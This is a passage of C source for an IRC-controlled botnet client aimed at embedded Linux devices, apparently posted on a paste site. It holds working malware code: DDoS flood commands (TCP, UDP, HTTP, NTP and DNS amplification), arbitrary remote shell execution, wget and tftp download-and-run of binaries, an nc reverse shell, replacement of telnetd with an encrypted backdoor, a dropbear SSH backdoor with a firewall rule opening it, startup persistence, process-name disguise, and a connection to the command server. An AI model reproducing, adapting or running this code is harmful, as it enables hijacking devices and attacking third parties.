- Send(sock, "NOTICE %s :SH <command> = Executes a command\n", sender); sleep(1);
- Send(sock, "NOTICE %s :ISH <command> = SH, interactive, sends to channel\n", sender); sleep(1);
- Send(sock, "NOTICE %s :SHD <command> = Executes a psuedo-daemonized command\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETBB <tftp server> = Get a proper busybox\n", sender); sleep(1);
- Send(sock, "NOTICE %s :INSTALL <http server/file_name> = Download & install a binary to /var/bin \n", sender); sleep(1);
- Send(sock, "NOTICE %s :BASH <cmd> = Execute commands using bash. \n", sender); sleep(1);
- Send(sock, "NOTICE %s :BINUPDATE <http:server/package> = Update a binary in /var/bin via wget \n", sender); sleep(1);
- Send(sock, "NOTICE %s :SCAN <nmap options> = Call the nmap wrapper script and scan with your opts. \n", sender); sleep(1);
- Send(sock, "NOTICE %s :RSHELL <server> <port> = Equates to nohup nc ip port -e /bin/sh\n", sender); sleep(1);
- Send(sock, "NOTICE %s :LOCKUP <http:server> = Kill telnet, d/l aes backdoor from <server>, run that instead.\n", sender); sleep(1);
- Send(sock, "NOTICE %s :GETSSH <http:server/dropbearmulti> = D/l, install, configure and start dropbear on port 30022.\n", sender); sleep(1);
- exit(0);
- }
- void killall(int sock, char *sender, int argc, char **argv) {
- unsigned long i;
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- if (sender) Send(sock, "NOTICE %s :Killing pid %d.\n", sender,pids[i]);
- kill(pids[i],9);
- }
- }
- }
- void killd(int sock, char *sender, int argc, char **argv) {
- char buf[1024]={0};
- if (disabled == 1) return;
- sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
- system(buf);
- exit(0);
- }
- struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
- { "PAN", pan },
- { "TCP", tcpflood },
- { "STD", sendSTD },
- { "UDP", udp },
- { "UNKNOWN", unknown },
- { "HTTPFLOOD", sendHTTP },
- { "NTP", ntp },
- { "BLACKNURSE", blacknurse },
- { "DNSAMP", dnsamp },
- { "QUAKE3", quake3 },
- { "PROXYFLUX", proxyflux },
- { "NICK", nickc },
- { "SERVER", move },
- { "GETSPOOFS", getspoofs },
- { "SPOOFS", spoof },
- { "HACKPKG", hackpkg },
- { "DISABLE", disable },
- { "ENABLE", enable },
- { "UPDATE", update },
- { "KILL", killd },
- { "GET", get },
- { "VERSION", version },
- { "KILLALL", killall },
- { "HELP", help },
- { (char *)0, (void (*)(int,char *,int,char **))0 } };
- void _PRIVMSG(int sock, char *sender, char *str) {
- int i;
- char *to, *message;
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- to=str;
- message=str+i+2;
- for (i=0;i<strlen(sender) && sender[i] != '!';i++);
- sender[i]=0;
- if (*message == '!' && !strcasecmp(to,chan)) {
- char *params[12], name[1024]={0};
- int num_params=0, m;
- message++;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- message[i]=0;
- if (strwildmatch(message,nick)) return;
- message+=i+1;
- if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock, "NOTICE %s :Unable to comply.\n", sender); else Send(sock, "%s\n",message+4);
- if (!strncmp(message,"SH ",3)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // SHD (daemonize sh command)
- if (!strncmp(message,"SHD ",4)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like eliminate (in this case tftp). We really want to have the c program handle as much of thse custom funcs as possile. I am not graet with c, but proficient with linux, so i added these.
- if (!strncmp(message,"GETBB ",6)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // GETSSH (download, install, start dropbear, requires busybox for wget, mv, somet other things that are not always present on embedded devices
- if (!strncmp(message,"GETSSH ",7)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use taht instead of needing to download busybox/wget first
- if (!strncmp(message,"INSTALL ",8)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // BINUPDATE http://server/file (like install, but updates the program)
- if (!strncmp(message,"BINUPDATE ",10)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to elimiate the dependency
- if (!strncmp(message,"LOCKUP ",7)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverese shell functiomn to eliminiate taht dependency
- if (!strncmp(message,"RSHELL ",6)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- //SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server
- if (!strncmp(message,"SCAN ",5)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- // !* BASH echo hello
- if (!strncmp(message,"BASH ",5)) {
- char buf[1024];
- FILE *command;
- if (mfork(sender) != 0) return;
- memset(buf,0,1024);
- sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);
- command=popen(buf,"r");
- while(!feof(command)) {
- memset(buf,0,1024);
- fgets(buf,1024,command);
- Send(sock, "NOTICE %s :%s\n", sender,buf);
- sleep(1);
- }
- pclose(command);
- exit(0);
- }
- m=strlen(message);
- for (i=0;i<m;i++) {
- if (*message == ' ' || *message == 0) break;
- name[i]=*message;
- message++;
- }
- for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
- num_params++;
- if (num_params > 10) num_params=10;
- params[0]=name;
- params[num_params+1]="\0";
- m=1;
- while (*message != 0) {
- message++;
- if (m >= num_params) break;
- for (i=0;i<strlen(message) && message[i] != ' ';i++);
- params[m]=(char*)malloc(i+1);
- strncpy(params[m],message,i);
- params[m][i]=0;
- m++;
- message+=i;
- }
- for (m=0; flooders[m].cmd != (char *)0; m++) {
- if (!strcasecmp(flooders[m].cmd,name)) {
- flooders[m].func(sock, sender,num_params-1,params);
- for (i=1;i<num_params;i++) free(params[i]);
- return;
- }
- }
- }
- }
- void _376(int sock, char *sender, char *str) {
- Send(sock, "MODE %s -xi\n",nick);
- Send(sock, "JOIN %s :%s\n",chan,key);
- Send(sock, "WHO %s\n",nick);
- startScanner(sock);
- }
- void _PING(int sock, char *sender, char *str) {
- Send(sock, "PONG %s\n",str);
- }
- void _352(int sock, char *sender, char *str) {
- int i,d;
- char *msg=str;
- struct hostent *hostm;
- unsigned long m;
- for (i=0,d=0;d<5;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if (!strcasecmp(msg,nick) && !spoofsm) {
- msg=str;
- for (i=0,d=0;d<3;d++) {
- for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
- if (i == strlen(str)) return;
- }
- for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
- msg[i]=0;
- if ((m = inet_addr(msg)) == -1) {
- if ((hostm=gethostbyname(msg)) == NULL) {
- Send(sock, "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
- return;
- }
- memcpy((char*)&m, hostm->h_addr, hostm->h_length);
- }
- ((char*)&spoofs)[3]=((char*)&m)[0];
- ((char*)&spoofs)[2]=((char*)&m)[1];
- ((char*)&spoofs)[1]=((char*)&m)[2];
- ((char*)&spoofs)[0]=0;
- spoofsm=256;
- }
- }
- void _433(int sock, char *sender, char *str) {
- free(nick);
- nick=randstring(rand() % 9 + 4);
- }
- void _NICK(int sock, char *sender, char *str) {
- int i;
- for (i=0;i<strlen(sender) && sender[i] != '!';i++);
- sender[i]=0;
- if (!strcasecmp(sender,nick)) {
- if (*str == ':') str++;
- if (nick) free(nick);
- nick=strdup(str);
- }
- }
- struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
- { "352", _352 },
- { "376", _376 },
- { "433", _433 },
- { "422", _376 },
- { "PRIVMSG", _PRIVMSG },
- { "PING", _PING },
- { "NICK", _NICK },
- { (char *)0, (void (*)(int,char *,char *))0 } };
- void con() {
- struct sockaddr_in srv;
- unsigned long ipaddr,start;
- int flag;
- struct hostent *hp;
- start:
- sock=-1;
- flag=1;
- if (changeservers == 0) server=servers[rand()%numservers];
- changeservers=0;
- while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
- if (inet_addr(server) == 0 || inet_addr(server) == -1) {
- if ((hp = gethostbyname(server)) == NULL) {
- server=NULL;
- close(sock);
- goto start;
- }
- bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
- }
- else srv.sin_addr.s_addr=inet_addr(server);
- srv.sin_family = AF_INET;
- srv.sin_port = htons(6667);
- ioctl(sock,FIONBIO,&flag);
- start=time(NULL);
- while(time(NULL)-start < 10) {
- errno=0;
- if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
- setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
- setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
- setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
- return;
- }
- if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
- sleep(1);
- }
- server=NULL;
- close(sock);
- goto start;
- }
- int main(int argc, char **argv) {
- int on,i;
- char cwd[256],*str;
- FILE *file;
- botkill();
- #ifdef STARTUP
- str="/etc/rc.d/rc.local";
- file=fopen(str,"r");
- if (file == NULL) {
- str="/etc/rc.conf";
- file=fopen(str,"r");
- }
- if (file != NULL) {
- char outfile[256], buf[1024];
- int i=strlen(argv[0]), d=0;
- getcwd(cwd,256);
- if (strcmp(cwd,"/")) {
- while(argv[0][i] != '/') i--;
- sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
- while(!feof(file)) {
- fgets(buf,1024,file);
- if (!strcasecmp(buf,outfile)) d++;
- }
- if (d == 0) {
- FILE *out;
- fclose(file);
- out=fopen(str,"a");
- if (out != NULL) {
- fputs(outfile,out);
- fclose(out);
- }
- }
- else fclose(file);
- }
- else fclose(file);
- }
- #endif
- if (fork()) exit(0);
- #ifdef FAKENAME
- strncpy(argv[0],FAKENAME,strlen(argv[0]));
- for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
- #endif
- srand((time(NULL) ^ getpid()) + getppid());
- nick=randstring(rand() % 9 + 4);
- ident=randstring(rand() % 9 + 4);
- user=randstring(rand() % 9 + 4);
- chan=CHAN;
- key=KEY;
- server=NULL;
- sa:
- #ifdef IDENT
- for (i=0;i<numpids;i++) {
- if (pids[i] != 0 && pids[i] != getpid()) {
- kill(pids[i],9);
- waitpid(pids[i],NULL,WNOHANG);
- }
- }
- pids=NULL;
- numpids=0;
- identd();
- #endif
- con();
- Send(sock, "NICK %s|%s|%s\nUSER %s localhost localhost :%s\n", PREFIX, getBuild(),nick,user,ident);
- while(1) {
- unsigned long i;
- fd_set n;
- struct timeval tv;
- FD_ZERO(&n);
- FD_SET(sock,&n);
- tv.tv_sec=60*20;
- tv.tv_usec=0;
- if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
- for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
- unsigned int *newpids,on;
- for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
- pids[on-1]=0;
- numpids--;
- newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
- for (on=0;on<numpids;on++) newpids[on]=pids[on];
- free(pids);
- pids=newpids;
- }
- if (FD_ISSET(sock,&n)) {
- char buf[4096], *str;
- int i;
- if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
- buf[i]=0;
- str=strtok(buf,"\n");
- while(str && *str) {
- char name[1024], sender[1024];
- filter(str);
- if (*str == ':') {
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(sender,str+1);
- strcpy(str,str+i+1);
- }
- else strcpy(sender,"*");
- for (i=0;i<strlen(str) && str[i] != ' ';i++);
- str[i]=0;
- strcpy(name,str);
- strcpy(str,str+i+1);
- for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock, sender,str);
- if (!strcasecmp(name,"ERROR")) goto sa;
- str=strtok((char*)NULL,"\n");
- }
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
